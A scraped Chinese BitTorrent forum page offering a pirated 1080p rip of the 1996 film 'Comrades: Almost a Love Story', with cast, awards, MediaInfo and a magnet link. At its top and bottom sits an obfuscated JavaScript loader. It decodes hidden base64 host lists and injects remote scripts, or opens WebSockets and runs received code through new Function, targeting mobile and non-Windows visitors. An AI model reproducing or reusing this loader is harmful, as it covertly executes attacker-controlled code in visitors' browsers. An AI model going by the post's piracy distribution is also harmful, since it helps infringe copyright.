甜蜜蜜[国语配音/中文字幕].Comrades.Almost.a.Love.Story.1996.1080p.BluRay.x265.10bit.DTS 9.29GB

版主小s 1月前 318

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 甜蜜蜜 / Comrades: Almost a Love Story

◎年 代 1996

◎产 地 中国香港

◎类 别 剧情 / 爱情

◎语 言 粤语 / 汉语普通话 / 英语

◎上映日期 2015-02-13(中国大陆) / 1996-11-02(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0117905/

◎豆瓣评分 8.9/10 (445694人评价)

◎豆瓣链接 https://movie.douban.com/subject/1305164/

◎片 长 118分钟(中国大陆)

◎导 演 陈可辛 Peter Chan (id:1274300)

◎编 剧 岸西 Ivy Ho (id:1286710)

◎演 员 黎明 Leon Lai (id:1036978)

张曼玉 Maggie Cheung (id:1274231)

杨恭如 Kristy Yang (id:1016866)

曾志伟 Eric Tsang (id:1002862)

杜可风 Christopher Doyle (id:1045151)

张同祖 Tung Cho Cheung (id:1313660)

诸慧荷 Irene Tsu Wai-Ho (id:1000555)

丁羽 Yu Ting (id:1052303)

王章宝 Cheung-Bo Wong (id:1447698)

关信辉 Adrian Kwan (id:1283395)

米歇尔·加布里埃尔 Michelle Gabriel (id:1452260)

谢志华 Chi-Wah Tse (id:1417403)

许月珍 Jojo Hui Yuet-chun (id:1302761)

陈可辛 Peter Chan (id:1274300)

陈惠 Chan Wai (id:1409367)

邹文怀 Raymond Chow (id:1016883)

赵增熹 Tsang-Hei Chiu (id:1280692)

马楚成 Jingle Ma (id:1280599)

邝志良 Chi-Leung Kwong (id:1289164)

陈祺合 Ki-hop Chan (id:1280429)

陳秀明 Sau-Ming Chan (id:1403988)

吴里璐 Dora Ng (id:1289270)

关信辉 Adrian Kwan (id:1283395)

邓汉强 Matthew Tang (id:1308894)

杜笃之 Du-Che Tu (id:1275159)

◎标 签 爱情 / 香港 / 经典 / 文艺 / 怀旧 / 浪漫 / 缘分 / 1996

◎简 介

改革开放初期,黎小军(黎明 饰)告别女友小婷(杨恭如 饰)从天津(国语版中为无锡)来到香港讨生活,期望有天挣到大钱把小婷接来与之风风光光地成婚,没料想日子会比想象中的难熬许多。

黎小军在快餐店与同样从大陆到港讨生活但避讳谈自己身份的李翘(张曼玉 饰)结识后,因为共同喜爱邓丽君,两人人在异乡的孤独都有了某种程度的缓解,并在交往的过程中生出了真爱,可是世事难料,两人最终无奈分手,黎小军成了小婷的老公,李翘跟了在黑社会做事的豹哥(曾志伟 饰)。然而因为邓丽君,两人的缘分并没到此为止。

◎获奖情况 (共17项)

第34届台北金马影展 (1997)

金马奖 最佳剧情片

金马奖 最佳女主角

└──张曼玉 (id:1274231)

金马奖 最佳男配角(提名)

└──曾志伟 (id:1002862)

金马奖 最佳原著剧本(提名)

└──岸西 (id:1286710)

金马奖 最佳摄影(提名)

└──马楚成 (id:1280599)

金马奖 最佳造型设计(提名)

└──吴里璐 (id:1289270)

第16届香港电影金像奖 (1997)

最佳电影

└──陈可辛 (id:1274300)

最佳导演

└──陈可辛 (id:1274300)

最佳编剧

└──岸西 (id:1286710)

最佳男主角(提名)

└──黎明 (id:1036978)

最佳女主角

└──张曼玉 (id:1274231)

最佳男配角

└──曾志伟 (id:1002862)

最佳新演员(提名)

└──杨恭如 (id:1016866)

最佳摄影

└──马楚成 (id:1280599)

最佳美术指导

└──奚仲文 (id:1275027)

最佳服装造型设计

└──吴里璐 (id:1289270)

最佳原创电影音乐

└──赵增熹 (id:1280692)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 299096141834723261360914206213358858230 (0xE103D2532235A25215D980133775AFF6)

  4. Complete name : Comr[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.29 GiB

  8. Duration : 1 h 55 min

  9. Overall bit rate : 11.5 Mb/s

  10. Encoded date : UTC 2021-10-26 01:15:15

  11. Writing application : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  12. Writing library : libebml v1.4.1 + libmatroska v1.6.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 55 min

  20. Bit rate : 9 919 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 036 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.208

  30. Stream size : 8.03 GiB (86%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=17.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1036 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Language : English

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. ID in the original source medium : 4352 (0x1100)

  39. Format : DTS

  40. Format/Info : Digital Theater Systems

  41. Codec ID : A_DTS

  42. Duration : 1 h 55 min

  43. Bit rate mode : Constant

  44. Bit rate : 1 509 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 16 bits

  50. Compression mode : Lossy

  51. Stream size : 1.22 GiB (13%)

  52. Language : Chinese

  53. Default : Yes

  54. Forced : No

  55. Original source medium : Blu-ray


  56. Text #1

  57. ID : 3

  58. ID in the original source medium : 4608 (0x1200)

  59. Format : PGS

  60. Muxing mode : zlib

  61. Codec ID : S_HDMV/PGS

  62. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration : 1 h 52 min

  64. Bit rate : 27.9 kb/s

  65. Count of elements : 2622

  66. Stream size : 22.5 MiB (0%)

  67. Language : English

  68. Default : Yes

  69. Forced : No

  70. Original source medium : Blu-ray


  71. Text #2

  72. ID : 4

  73. ID in the original source medium : 4609 (0x1201)

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 1 h 52 min

  79. Bit rate : 27.4 kb/s

  80. Count of elements : 2622

  81. Stream size : 22.1 MiB (0%)

  82. Language : Chinese

  83. Default : No

  84. Forced : No

  85. Original source medium : Blu-ray


  86. Text #3

  87. ID : 5

  88. ID in the original source medium : 4610 (0x1202)

  89. Format : PGS

  90. Muxing mode : zlib

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 1 h 52 min

  94. Bit rate : 27.6 kb/s

  95. Count of elements : 2622

  96. Stream size : 22.2 MiB (0%)

  97. Language : Chinese

  98. Default : No

  99. Forced : No

  100. Original source medium : Blu-ray


  101. Text #4

  102. ID : 6

  103. ID in the original source medium : 4611 (0x1203)

  104. Format : PGS

  105. Muxing mode : zlib

  106. Codec ID : S_HDMV/PGS

  107. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  108. Duration : 1 h 53 min

  109. Bit rate : 23.2 kb/s

  110. Count of elements : 2267

  111. Stream size : 18.8 MiB (0%)

  112. Language : Korean

  113. Default : No

  114. Forced : No

  115. Original source medium : Blu-ray


  116. Menu

  117. 00:00:00.000 : en:第 01 章

  118. 00:09:12.583 : en:第 02 章

  119. 00:17:02.583 : en:第 03 章

  120. 00:31:25.625 : en:第 04 章

  121. 00:39:01.000 : en:第 05 章

  122. 00:47:17.000 : en:第 06 章

  123. 00:57:34.000 : en:第 07 章

  124. 01:04:37.750 : en:第 08 章

  125. 01:12:40.666 : en:第 09 章

  126. 01:21:50.458 : en:第 10 章

  127. 01:36:12.083 : en:第 11 章

  128. 01:45:32.291 : en:第 12 章




复制代码


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:54E2AEA06716E916F982DD049B0C59B67A777D01

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};